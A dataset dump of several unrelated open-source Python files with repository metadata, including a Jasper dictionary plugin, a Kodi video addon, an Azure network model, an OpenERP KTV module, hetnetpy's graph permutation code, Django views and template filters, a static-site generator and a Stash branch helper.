| gpl-3.0 | -3,779,461,491,146,289,700 | 32.767123 | 74 | 0.619067 | false |
iamjake648/jasper-dictionary | Define.py | 1 | 1593 | #Written by Jake Schultz
#TODO Add more lang support, limit number of results returned
import re
from urllib2 import Request, urlopen, URLError
import json
WORDS = ["DEFINE","WHAT DOES %S MEAN","DEFINITION", "WHAT IS [A|AN]? %S"]
PRIORITY = 1
def handle(text, mic, profile, recursive=False):
text = re.sub(r"(?i)(define|(what is the\s)?definition of|what does|mean|what is (a|an)?)\b","", text ).strip()
if len(text) != 0:
#Yandex Dictionary API Key
dict_key = profile['keys']['YANDEX_DICT']
#method to get the def
get_def(text,mic,dict_key)
elif not recursive:
mic.say("What word would you like to define?")
handle(mic.activeListen(), mic, profile, True)
def get_def(text,mic,key):
#make a call to the API
request = Request('https://dictionary.yandex.net/api/v1/dicservice.json/lookup?key='+key+'&lang=en-en&text='+text)
try:
response = urlopen(request)
data = json.load(response)
if len(data["def"]) == 0:
mic.say("I could not find a definition for " + str(text))
else:
#get the word type (noun, verb, ect)
word_type = data["def"][0]["pos"]
mic.say("The word is a " + word_type)
defs = data["def"][0]["tr"]
#loop through the definitions
for text in defs:
mic.say(text["text"])
except URLError, e:
mic.say("Unable to reach dictionary API.")
def isValid(text):
return bool(re.search(r'\Define|what does\s(.*?)\smean|Definition|what is\s\w+\b',text, re.IGNORECASE))
| gpl-2.0 | 1,097,689,116,695,614,700 | 34.4 | 118 | 0.603264 | false |
felipenaselva/repo.felipe | plugin.video.uwc/k18.py | 1 | 2513 | '''
Ultimate Whitecream
Copyright (C) 2015 mortael
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import urllib, urllib2, re, cookielib, os.path, sys, socket
import xbmc, xbmcplugin, xbmcgui, xbmcaddon
import utils
#230: k18.Main()
#231: k18.List(url)
#232: k18.Playvid(url, name, download)
#233: k18.Cat(url)
#234: k18.Search(url, keyword)
progress = utils.progress
def Main():
utils.addDir('[COLOR hotpink]Categories[/COLOR]','http://k18.co/',233,'','')
utils.addDir('[COLOR hotpink]Search[/COLOR]','http://k18.co/?s=',234,'','')
List('http://k18.co/page/1/')
xbmcplugin.endOfDirectory(utils.addon_handle)
def List(url):
listhtml = utils.getHtml(url, '')
match = re.compile(r'class="content-list-thumb">\s+<a href="([^"]+)" title="([^"]+)">.*?src="([^"]+)"', re.DOTALL | re.IGNORECASE).findall(listhtml)
for videopage, name, img in match:
name = utils.cleantext(name)
utils.addDownLink(name, videopage, 232, img, '')
try:
        nextp=re.compile('next page-numbers" href="([^"]+)">»', re.DOTALL | re.IGNORECASE).findall(listhtml)[0]
utils.addDir('Next Page', nextp, 231,'')
except: pass
xbmcplugin.endOfDirectory(utils.addon_handle)
def Search(url, keyword=None):
searchUrl = url
if not keyword:
utils.searchDir(url, 234)
else:
title = keyword.replace(' ','+')
searchUrl = searchUrl + title
print "Searching URL: " + searchUrl
List(searchUrl)
def Cat(url):
cathtml = utils.getHtml(url, '')
match = re.compile('0" value="([^"]+)">([^<]+)<', re.DOTALL | re.IGNORECASE).findall(cathtml)
for catpage, name in match:
catpage = 'http://k18.co/?cat=' + catpage
utils.addDir(name, catpage, 231, '')
xbmcplugin.endOfDirectory(utils.addon_handle)
def Playvid(url, name, download=None):
utils.PLAYVIDEO(url, name, download)
| gpl-2.0 | -4,485,078,390,973,765,600 | 32.959459 | 152 | 0.655392 | false |
AutorestCI/azure-sdk-for-python | azure-mgmt-network/azure/mgmt/network/v2017_09_01/models/application_gateway_url_path_map.py | 1 | 3397 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewayUrlPathMap(SubResource):
"""UrlPathMaps give a url path to the backend mapping information for
PathBasedRouting.
:param id: Resource ID.
:type id: str
:param default_backend_address_pool: Default backend address pool resource
of URL path map.
:type default_backend_address_pool:
~azure.mgmt.network.v2017_09_01.models.SubResource
:param default_backend_http_settings: Default backend http settings
resource of URL path map.
:type default_backend_http_settings:
~azure.mgmt.network.v2017_09_01.models.SubResource
:param default_redirect_configuration: Default redirect configuration
resource of URL path map.
:type default_redirect_configuration:
~azure.mgmt.network.v2017_09_01.models.SubResource
:param path_rules: Path rule of URL path map resource.
:type path_rules:
list[~azure.mgmt.network.v2017_09_01.models.ApplicationGatewayPathRule]
:param provisioning_state: Provisioning state of the backend http settings
resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:type provisioning_state: str
:param name: Name of the resource that is unique within a resource group.
This name can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
:param type: Type of the resource.
:type type: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'default_backend_address_pool': {'key': 'properties.defaultBackendAddressPool', 'type': 'SubResource'},
'default_backend_http_settings': {'key': 'properties.defaultBackendHttpSettings', 'type': 'SubResource'},
'default_redirect_configuration': {'key': 'properties.defaultRedirectConfiguration', 'type': 'SubResource'},
'path_rules': {'key': 'properties.pathRules', 'type': '[ApplicationGatewayPathRule]'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, id=None, default_backend_address_pool=None, default_backend_http_settings=None, default_redirect_configuration=None, path_rules=None, provisioning_state=None, name=None, etag=None, type=None):
super(ApplicationGatewayUrlPathMap, self).__init__(id=id)
self.default_backend_address_pool = default_backend_address_pool
self.default_backend_http_settings = default_backend_http_settings
self.default_redirect_configuration = default_redirect_configuration
self.path_rules = path_rules
self.provisioning_state = provisioning_state
self.name = name
self.etag = etag
self.type = type
| mit | -8,994,817,424,965,197,000 | 47.528571 | 215 | 0.664999 | false |
chengdh/openerp-ktv | openerp/addons/ktv_sale/room_operate.py | 1 | 3418 | # -*- coding: utf-8 -*-
from osv import osv,fields
from room import room
class room_operate(osv.osv):
'''
    Room operation class:
    All of the following operations are room operations:
    1 reservation
    2 normal room opening (check-in)
    3 buying time (timed session)
    4 buyout (flat-rate session)
    5 extending time
    6 refunding time
    7 changing rooms
    8 merging rooms
    A room is linked to its room_operate through cur_room_operate_id, which marks the operation the room is currently associated with.
    room_operate has a one2many relationship with each of the operations above, so every operation performed while the room is open can be reached from a single room_operate; at checkout all operations are iterated over and settled.
'''
_name = "ktv.room_operate"
    # this object is referenced elsewhere, so name is defined as bill_no
_rec_name = "bill_no"
_description = "包厢操作类,与包厢是many2one的关系"
_columns = {
"operate_date" : fields.datetime('operate_datetime',required = True),
"room_id" : fields.many2one('ktv.room','room_id',required = True),
"bill_no" : fields.char("bill_no",size = 64,required = True,help = "账单号"),
"room_scheduled_ids" : fields.one2many("ktv.room_scheduled","room_operate_id",help="预定信息列表"),
"room_opens_ids" : fields.one2many("ktv.room_opens","room_operate_id",help="开房信息列表"),
}
_defaults = {
'operate_date' : fields.datetime.now,
'bill_no': lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'ktv.room_operate'),
}
def process_operate(self,cr,uid,operate_values):
"""
        Unified entry point for room operations; dispatches to the business class of each operation.
        The benefit of this design is that it isolates change: if the server-side logic needs to change,
        the client-side calling logic does not have to be modified at all.
        When the client calls a newly added business entity, only that new entity has to be added; nothing else changes.
        The js side should wrap the same calling interface to keep change isolated there as well.
        :params room_id integer room code
        :operate_values business operation data passed in by the front end
        :operate[osv_name] name of the business entity object to call, e.g. ktv.room_checkout
        Example call:
        Opening a room returns three values: 1 the entity object of the successful operation, 2 the state the room should be set to, 3 a cron object used to schedule timed actions on the room:
        (operate_obj,room_state,cron) = self.pool.get(operate_values['osv_name']).process_operate(cr,uid,operate_values)
        Update the current room state, add the cron object and return the processing result
"""
room_id = operate_values['room_id']
(operate_obj,room_state,cron) = self.pool.get(operate_values['osv_name']).process_operate(cr,uid,operate_values)
        # update the room state
self.pool.get('ktv.room').write(cr,uid,room_id,{'state' : room_state})
        # TODO add the cron object
if cron:
self._create_operate_cron(cr,uid,cron)
room_fields = self.pool.get('ktv.room').fields_get(cr,uid).keys()
room = self.pool.get('ktv.room').read(cr,uid,room_id,room_fields)
        # return the two objects: room and room_operate
return {'room' : room,'room_operate' : operate_obj}
def _create_operate_cron(self,cr,uid,cron_vals):
"""
        Create a cron job for scheduled execution; needed whenever a timed room-closing task has to be run.
        :params dict cron_vals attributes of the scheduled task
"""
return self.pool.get('ir.cron').create(cr,uid,cron_vals)
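    # Illustrative usage sketch (added comment, not part of the original module): the client is
    # expected to pass process_operate a dict whose 'osv_name' names the business object that
    # handles the operation, e.g. (the concrete values below are hypothetical):
    #   operate_values = {'osv_name': 'ktv.room_checkout', 'room_id': 1}
    #   result = self.pool.get('ktv.room_operate').process_operate(cr, uid, operate_values)
    #   # result -> {'room': {...}, 'room_operate': <record of the executed operation>}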
| agpl-3.0 | -4,107,985,104,135,844,400 | 35.166667 | 120 | 0.621352 | false |
dhimmel/hetio | hetnetpy/permute.py | 1 | 9110 | import collections
import random
import logging
from hetnetpy.hetnet import Graph
def permute_graph(graph, multiplier=10, seed=0, metaedge_to_excluded=dict(), log=False):
"""
Derive a permuted hetnet from an input hetnet. This method applies the
XSwap algorithm separately for each metaedge. Hence, node degree is
preserved for each type of edge. However, edges are randomized / shuffled.
Users are recommended to interrogate the reported statistics to ensure that
edges appear to be sufficiently randomized. Primarily, the number of edges
of a given metaedge that remain unchanged from the original hetnet should
    have reached an asymptote. If the number of unchanged edges has not yet
    stabilized, further randomization is possible with this approach.
Parameters
----------
graph : hetnetpy.hetnet.Graph
Input hetnet to create a permuted derivative from
multiplier : int or float
This is multiplied by the number of edges for each metaedge to
determine the number of swaps to attempt.
seed : int
Seed to initialize Python random number generator. When creating many
permuted hetnets, it's recommended to increment this number, such that
each round of permutation shuffles edges in a different order.
metaedge_to_excluded : dict (metaedge -> set)
Edges to exclude. This argument has not been extensively used in
practice.
log : bool
Whether to log diagnostic INFO via python's logging module.
Returns
-------
permuted_graph : hetnetpy.hetnet.Graph
A permuted hetnet derived from the input graph.
stats : list of dicts
A list where each item is a dictionary of permutation statistics at a
checkpoint for a specific metaedge. These statistics allow tracking the
progress of the permutation as the number of attempted swaps increases.
"""
if log:
logging.info("Creating permuted graph template")
permuted_graph = Graph(graph.metagraph)
for (metanode_identifier, node_identifier), node in graph.node_dict.items():
permuted_graph.add_node(
metanode_identifier, node_identifier, name=node.name, data=node.data
)
if log:
logging.info("Retrieving graph edges")
metaedge_to_edges = graph.get_metaedge_to_edges(exclude_inverts=True)
if log:
logging.info("Adding permuted edges")
all_stats = list()
for metaedge, edges in metaedge_to_edges.items():
if log:
logging.info(metaedge)
excluded_pair_set = metaedge_to_excluded.get(metaedge, set())
pair_list = [(edge.source.get_id(), edge.target.get_id()) for edge in edges]
directed = metaedge.direction != "both"
permuted_pair_list, stats = permute_pair_list(
pair_list,
directed=directed,
multiplier=multiplier,
excluded_pair_set=excluded_pair_set,
seed=seed,
log=log,
)
for stat in stats:
stat["metaedge"] = metaedge
stat["abbrev"] = metaedge.abbrev
all_stats.extend(stats)
for pair in permuted_pair_list:
permuted_graph.add_edge(pair[0], pair[1], metaedge.kind, metaedge.direction)
return permuted_graph, all_stats
def permute_pair_list(
pair_list,
directed=False,
multiplier=10,
excluded_pair_set=set(),
seed=0,
log=False,
inplace=False,
):
"""
Permute edges (of a single type) in a graph according to the XSwap function
described in https://doi.org/f3mn58. This method selects two edges and
attempts to swap their endpoints. If the swap would result in a valid edge,
the swap proceeds. Otherwise, the swap is skipped. The end result is that
node degree is preserved, but edges are shuffled, thereby losing their
original meaning.
Parameters
----------
pair_list : list of tuples
List of edges to permute. Each edge is represented as a (source,
target) tuple. source and target represent nodes and can be any Python
objects that define __eq__. In other words, this function does not
assume any specific format for nodes. If the edges are from a bipartite
or directed graph, then all tuples must have the same alignment. For
example, if the edges represent the bipartite Compound-binds-Gene
relationship, all tuples should be of the form (compound, gene) and not
intermixed with (gene, compound) tuples. The only instance where order
of the source and target is not important is for an undirected edge
type where the source and target nodes are of the same type, such as
Gene-interacts-Gene.
directed : bool
Whether the edge should be considered directed. If False, a swap that
creates an a-b edge will be invalid if a b-a edge already exists.
multiplier : int or float
This is multiplied by the number of edges in pair_list to determine the
number of swaps to attempt.
excluded_pair_set : set of tuples:
Set of possible edges to forbid. If a swap would create an edge in this
set, it would be considered invalid and hence skipped.
seed : int
Seed to initialize Python random number generator.
log : bool
Whether to log diagnostic INFO via python's logging module.
inplace : bool
Whether to modify the edge list in place.
Returns
-------
pair_list : list of tuples
The permuted edges, derived from the input pair_list.
stats : list of dicts
A list where each item is a dictionary of permutation statistics at a
checkpoint. Statistics are collected at 10 checkpoints, spaced evenly
by the number of attempts.
"""
random.seed(seed)
if not inplace:
pair_list = pair_list.copy()
pair_set = set(pair_list)
assert len(pair_set) == len(pair_list)
edge_number = len(pair_list)
n_perm = int(edge_number * multiplier)
count_same_edge = 0
count_self_loop = 0
count_duplicate = 0
count_undir_dup = 0
count_excluded = 0
if log:
logging.info(
"{} edges, {} permutations (seed = {}, directed = {}, {} excluded_edges)".format(
edge_number, n_perm, seed, directed, len(excluded_pair_set)
)
)
orig_pair_set = pair_set.copy()
step = max(1, n_perm // 10)
print_at = list(range(step, n_perm, step)) + [n_perm - 1]
stats = list()
for i in range(n_perm):
# Same two random edges
i_0 = random.randrange(edge_number)
i_1 = random.randrange(edge_number)
# Same edge selected twice
if i_0 == i_1:
count_same_edge += 1
continue
pair_0 = pair_list.pop(i_0)
pair_1 = pair_list.pop(i_1 - 1 if i_0 < i_1 else i_1)
new_pair_0 = pair_0[0], pair_1[1]
new_pair_1 = pair_1[0], pair_0[1]
valid = False
for pair in new_pair_0, new_pair_1:
if pair[0] == pair[1]:
count_self_loop += 1
break # edge is a self-loop
if pair in pair_set:
count_duplicate += 1
break # edge is a duplicate
if not directed and (pair[1], pair[0]) in pair_set:
count_undir_dup += 1
break # edge is a duplicate
if pair in excluded_pair_set:
count_excluded += 1
break # edge is excluded
else:
# edge passed all validity conditions
valid = True
# If new edges are invalid
if not valid:
for pair in pair_0, pair_1:
pair_list.append(pair)
# If new edges are valid
else:
for pair in pair_0, pair_1:
pair_set.remove(pair)
for pair in new_pair_0, new_pair_1:
pair_set.add(pair)
pair_list.append(pair)
if i in print_at:
stat = collections.OrderedDict()
stat["cumulative_attempts"] = i
index = print_at.index(i)
stat["attempts"] = (
print_at[index] + 1
if index == 0
else print_at[index] - print_at[index - 1]
)
stat["complete"] = (i + 1) / n_perm
stat["unchanged"] = len(orig_pair_set & pair_set) / len(pair_set)
stat["same_edge"] = count_same_edge / stat["attempts"]
stat["self_loop"] = count_self_loop / stat["attempts"]
stat["duplicate"] = count_duplicate / stat["attempts"]
stat["undirected_duplicate"] = count_undir_dup / stat["attempts"]
stat["excluded"] = count_excluded / stat["attempts"]
stats.append(stat)
count_same_edge = 0
count_self_loop = 0
count_duplicate = 0
count_undir_dup = 0
count_excluded = 0
assert len(pair_set) == edge_number
return pair_list, stats
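if __name__ == "__main__":
    # Illustrative usage sketch (added for documentation, not part of the original library):
    # permute a tiny undirected edge list; node degrees are preserved while endpoints are shuffled.
    example_edges = [("a", "b"), ("c", "d"), ("a", "d"), ("b", "c")]
    permuted_edges, checkpoint_stats = permute_pair_list(
        example_edges, directed=False, multiplier=10, seed=0)
    print(permuted_edges)
    print(checkpoint_stats[-1])  # statistics of the final checkpoint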
| cc0-1.0 | 7,102,797,442,596,513,000 | 36.03252 | 93 | 0.615038 | false |
coetzeevs/chiron | mysite/polls/views.py | 1 | 1976 | from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect
from django.template import loader
from .models import Question, Choice
from django.urls import reverse
from django.views import generic
from django.utils import timezone
from django.core.mail import EmailMessage
from django.conf import settings
class IndexView(generic.ListView):
template_name = 'polls/index.html'
context_object_name = 'latest_question_list'
def get_queryset(self):
"""
Return the last five published questions (not including those set to be
published in the future).
"""
return Question.objects.filter(
pub_date__lte=timezone.now()
).order_by('-pub_date')[:5]
class DetailView(generic.DetailView):
model = Question
template_name = 'polls/detail.html'
def get_queryset(self):
"""
Excludes any questions that aren't published yet.
"""
return Question.objects.filter(pub_date__lte=timezone.now())
class ResultsView(generic.DetailView):
model = Question
template_name = 'polls/results.html'
def email(request):
email = EmailMessage('hello', 'Hello Johan, Minder OLX en meer ChiChi',settings.EMAIL_HOST_USER, to=['[email protected]'])
email.send()
return HttpResponse("Hello, world. You're at the polls index.")
def vote(request, question_id):
question = get_object_or_404(Question, pk=question_id)
try:
selected_choice = question.choice_set.get(pk=request.POST['choice'])
except (KeyError, Choice.DoesNotExist):
# Redisplay the question voting form.
return render(request, 'polls/detail.html', {
'question': question,
'error_message': "You didn't select a choice.",
})
else:
selected_choice.votes += 1
selected_choice.save()
# Always return an HttpResponseRedirect after successfully dealing
# with POST data. This prevents data from being posted twice if a
# user hits the Back button.
return HttpResponseRedirect(reverse('polls:results', args=(question.id,))) | mit | -8,582,128,274,714,350,000 | 30.380952 | 130 | 0.745951 | false |
yvesalexandre/bandicoot | bandicoot/__init__.py | 1 | 1498 | # The MIT License (MIT)
#
# Copyright (c) 2015-2016 Massachusetts Institute of Technology.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
__all__ = ['core', 'individual', 'spatial', 'recharge', 'network', 'helper', 'io', 'utils', 'tests']
from .io import read_csv, to_json, to_csv
from .core import User, Record, Recharge, Position
from . import individual, spatial, recharge, network, helper, utils, io, tests, core, visualization
import bandicoot.helper.tools
__version__ = "0.6.0"
| mit | -4,582,053,342,048,739,000 | 47.322581 | 100 | 0.757009 | false |
sphaero/appie | appie/appie.py | 1 | 10447 | #!/usr/bin/python3
#
# Copyright (c) 2013, Arnaud Loonstra, All rights reserved.
# Copyright (c) 2013, Stichting z25.org, All rights reserved.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either
# version 3.0 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License v3 for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library.
import os
import shutil
from functools import reduce
import textile
import json
import logging
import pprint
# for pre 3.5 python versions
try:
os.scandir
except AttributeError:
import scandir
os.scandir = scandir.scandir
logger = logging.getLogger(__name__)
config = {
'target': "./build",
'src': "./site_src"
}
def mergedicts(dict1, dict2):
for k in set(dict1.keys()).union(dict2.keys()):
if k in dict1 and k in dict2:
if isinstance(dict1[k], dict) and isinstance(dict2[k], dict):
yield (k, dict(mergedicts(dict1[k], dict2[k])))
else:
# If one of the values is not a dict, you can't continue merging it.
# Value from second dict overrides one in first and we move on.
yield (k, dict2[k])
# Alternatively, replace this with exception raiser to alert you of value conflicts
elif k in dict1:
yield (k, dict1[k])
else:
yield (k, dict2[k])
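# Illustrative example (added comment): dict(mergedicts({'a': {'x': 1}}, {'a': {'y': 2}, 'b': 3}))
# evaluates to {'a': {'x': 1, 'y': 2}, 'b': 3}; nested dicts are merged recursively and, on a
# conflict of plain values, the value from the second dict wins.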
class AppieDirParser(object):
"""
The default dir parser. Searches for parsers matching file or
directory parsers. If none found it recurses into subdirs and
loads files prepended with '_'(underscore).
Files are copied to the build root.
A file is represented by a dictionary with at least the following keys
* content: file content if applicable
* path: filepath ( in the build dir )
* mtime: modification time
"""
def match(self, name):
"""
Test if this parser matches for a name
:param str name: file or directory name
"""
return False
def is_modified(self, dirobj, prev_dict):
"""
        Check the file's mtime and compare it to the value from the previous run.
        Returns True if the file has been modified since then.
"""
if not prev_dict or not prev_dict.get(dirobj.name):
return True # no previous data found so modified
return dirobj.stat().st_mtime > prev_dict.get(dirobj.name)[ 'mtime' ]
def parse_dir(self, path, dest_path, prev_dict=None):
"""
Parse a directory. Will search parser to match file or directory names
:param str path: path of the directory
:param str dest_path: path of the destination directory
:param dict prev_dict: the dictionary belonging to this directory loaded
from a previous run
Returns the dictionary with contents of the directory
"""
prev_dict = prev_dict or {}
d = {}
for item in os.scandir(path):
# save the relative! path in the buildroot instead of the original
web_path = dest_path.split(config['target'])[1][1:]
if item.is_dir():
d[item.name] = self.parse_subdir( item, dest_path, prev_dict, web_path)
elif self.is_modified( item, prev_dict ):
# find a parser for this file
parser = Appie.match_file_parsers(item.name)
d[item.name] = parser.parse_file( item.path, item.name, dest_path )
d[item.name]['path'] = web_path
d[item.name]['mtime'] = item.stat().st_mtime
# copy file to dest if no content key
if not d[item.name].get( 'content' ) and parser.copyfile:
logging.debug("Copy file {0} to the directory {1}"\
.format(path, dest_path))
shutil.copy(item.path, dest_path)
else:
d[item.name] = prev_dict[item.name]
return d
def parse_subdir(self, diritem, dest_path, prev_dict, web_path):
ret = {}
new_dest_path = os.path.join(dest_path, diritem.name)
# first create its dir
try:
os.makedirs(new_dest_path)
except FileExistsError:
pass
# find a parser for this dir
parser = Appie.match_dir_parsers(diritem.name)
content = parser.parse_dir( diritem.path, new_dest_path, prev_dict.get( diritem.name ))
# add meta information if the parser returned content
if content:
content['path'] = web_path
content['mtime'] = diritem.stat().st_mtime
else:
            # if not, remove the (empty) destination directory again
            # note: os.rmdir raises OSError if new_dest_path is not empty
            os.rmdir(new_dest_path)
return content
class AppieFileParser(object):
"""
Appie default file parser. Loads the content of a file if
it starts with _ (underscore).
"""
def __init__(self, *args, **kwargs):
self.copyfile = True # use the flag to tell the dirparser
# to copy the file or not
def match(self, name):
"""
Matches on files with the extension .textile
"""
if name[0] == '_':
return True
def parse_file(self, path, filename, dest_path):
"""
Parse file. If it starts with '_' (underscore) it will be loaded
and returned as the content key in a dictionary
Override this method in a custom parser class and add any data you
need.
:param str path: Path to the file
:param str filename: The name of the file
"""
if self.match(filename): # we only test again because the FileParser is always returned if
return { 'content': self.load_file(path) } # no other parser matches but we only want to load if starting with _
return {}
def load_file(self, path, mode='r'):
"""
parse the file and return the content for the dict
:param str file: the path to the file
"""
with open(path, mode, encoding="utf8") as f:
data = f.read()
f.close()
return data
class AppieTextileParser(AppieFileParser):
"""
Simple textile file to html parser
"""
def match(self, name):
"""
Matches on files with the extension .textile
"""
logging.debug('Matching AppieTextileParser to {0}'.format(name))
if name.endswith('.textile'):
return True
def parse_file(self, path, filename, dest_path):
"""
Parses textile files to html.
:param path: full path of the file
:param filename: the name of the file
Returns a dictionary with the content of the file in the content
key!
"""
logging.debug("TextileParser parsing {0}".format(filename))
t = textile.textile(self.load_file(path))
return { 'content': t }
class Appie(object):
dir_parsers = []
file_parsers = []
def __init__(self, *args, **kwargs):
# check if string and convert to list if so
if isinstance(config["src"], str):
config["src"] = [config["src"]]
self._buildwd = os.path.abspath(config["target"])
def add_directory_parser(self, inst):
"""
Adds a parser instance to match on directory names
:param instance inst: parser instance
"""
Appie.dir_parsers.insert(0, inst)
def add_file_parser(self, inst):
"""
Adds a parser instance to match on filenames
:param instance inst: parser instance
"""
Appie.file_parsers.insert(0, inst)
@staticmethod
def match_dir_parsers(dirname):
"""
Returns the parser for the directory
:params str dirname: directory name to match on
"""
for p in Appie.dir_parsers:
if p.match(dirname):
return p
return AppieDirParser() # default is self
@staticmethod
def match_file_parsers(filename):
"""
Returns the parser for the file
:params str filename: filename to match on
"""
for p in Appie.file_parsers:
if p.match(filename):
return p
return AppieFileParser() # default is AppieFileParser
def parse(self):
"""
Parse the all source directories
"""
# create the buildroot
prev = None # previous all.json container
try:
os.makedirs(self._buildwd)
except FileExistsError:
# try to load previous run
try:
prev = self.load_dict( os.path.join(self._buildwd, 'all.json' ) )
except FileNotFoundError:
prev = None
final = {}
for src in config["src"]:
d = AppieDirParser().parse_dir( src, config["target"], prev )
final = dict(mergedicts(final, d))
#return final
self.save_dict(final, os.path.join(config["target"], 'all.json'))
def save_dict(self, d, filepath):
"""
Save dictionary to json file
:param dict d: the dictionary to save
:param string filepath: string containing the full target filepath
"""
with open(filepath, 'w') as f:
json.dump(d, f)
def load_dict(self, filepath):
"""
load json file
:param dict d: the dictionary to save
:param string filepath: string containing the full target filepath
"""
with open(filepath, 'r') as f:
d = json.load(f)
return d
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
config["src"] = '../tests/site_src'
a = Appie()
a.add_file_parser(AppieTextileParser())
a.parse()
| gpl-3.0 | 1,061,268,915,449,003,600 | 32.376997 | 126 | 0.57538 | false |
LACNIC/simon | simon-web/simon_app/templatetags/simon_extras.py | 1 | 2401 | from django import template
from datetime import datetime
from simon_app.functions import GMTUY
import operator
"""
Module that holds the Simon custom template filters.
"""
register = template.Library()
@register.filter(name="substract")
def substract(value, arg):
"""
    Subtract arg from value
"""
return value - arg
@register.filter(name="divide")
def divide(value, arg):
"""
Float division
"""
return float(value) / float(arg)
@register.filter(name="percentage")
def percentage(value, arg):
"""
Percentage
"""
return 100.0 * divide(value, arg)
@register.filter(name="unit_shortener")
def unit_shortener(value):
"""
Unit converter
"""
try:
int(value)
float(value)
except:
return "N/A"
K = 1000
M = K * K
G = K * M
T = K * G
if value > T:
return "%.1f %s" % (1.0 * value / T, 'T')
if value > G:
return "%.1f %s" % (1.0 * value / G, 'G')
if value > M:
return "%.1f %s" % (1.0 * value / M, 'M')
if value > K:
return "%.1f %s" % (1.0 * value / K, 'K')
return value
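# Illustrative example (added comment): {{ 1500|unit_shortener }} renders "1.5 K";
# values of 1000 or below are returned unchanged, and non-numeric input yields "N/A".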
@register.filter(name="time_since")
def time_since(value):
"""
    :param value: datetime to measure the elapsed time from
    :return: human-readable string describing the elapsed time
"""
td = datetime.now(GMTUY()) - value
print td
if td.days > 1:
return "mas de un dia"
elif td.seconds > 3600:
mins = "%.0f minutos" % ((td.seconds % 3600) / 60)
horas = "%.0f %s" % (td.seconds / 3600, "horas" if td.seconds / 3600 > 1 else "hora")
return "%s %s" % (horas, mins)
elif td.seconds > 60:
return "%.0f minutos" % (td.seconds / 60)
else:
return "%.0f segundos" % td.seconds
@register.filter(name="max")
def max_(value, arg):
"""
:param value:
:param arg:
:return:
"""
if arg == 'v6_rate':
return str(max([v.v6_rate for v in value]))
return "%s %s" % (value, arg)
@register.filter(name="get_by_attribute")
def get_by_attribute(objects, raw_args):
print raw_args
key, value = raw_args.split(' ')
print key, value
func = operator.attrgetter(key)
for o in objects:
if func(o) == value:
return o
class Object():
pass
a = Object()
setattr(a, key, 0)
return a
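# Illustrative example (added comment, attribute and value are hypothetical):
# {{ probes|get_by_attribute:"country UY" }} returns the first object in 'probes' whose
# .country equals the string "UY", or a stub object with that attribute set to 0 if none matches.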
@register.filter(name="get_attribute")
def get_attribute(object, attr):
func = operator.attrgetter(attr)
return func(object)
| gpl-2.0 | 4,992,362,165,801,028,000 | 18.208 | 93 | 0.548105 | false |
gpailler/AtlassianBot | plugins/stash.py | 1 | 1971 | # coding: utf-8
import requests
from utils import rest
class Stash(object):
def __init__(self, server):
self.__server = server
def get_stash_branches(self, repos, project, filter):
results = []
for repo in repos:
path = '/rest/api/1.0/projects/{project}/repos/{repo}/branches'\
.format(project=project, repo=repo)
data = {
'filterText': filter,
'details': True,
'limit': 100
}
request = rest.get(self.__server, path, data)
for result in request.json()['values']:
results.append((
repo,
result['id'],
result['displayId'],
result['latestChangeset']))
return results
def branch_merged(self, project, basebranches, repo, branch):
for to in basebranches:
path = ('/rest/api/1.0/projects/{project}/repos/{repo}/'
'compare/changes/').format(project=project, repo=repo)
data = {
'from': branch,
'to': to,
'limit': 1
}
request = rest.get(self.__server, path, data)
if request.status_code != requests.codes.ok:
raise Exception(request.text)
else:
if request.json()['size'] == 0:
return True
return False
def remove_git_branches(self, project, repo, branchkey, changeset):
path = ('/rest/branch-utils/1.0/projects/{project}/repos/{repo}/'
'branches').format(project=project, repo=repo)
data = {
'name': branchkey,
'endPoint': changeset,
'dryRun': False
}
request = rest.delete(self.__server, path, data)
if request.status_code != requests.codes.no_content:
raise Exception(request.text)
| mit | -3,836,757,531,418,483,700 | 30.790323 | 76 | 0.499239 | false |
samdoshi/teletype | utils/docs.py | 1 | 6073 | #!/usr/bin/env python3
import sys
from pathlib import Path
import jinja2
import pypandoc
import pytoml as toml
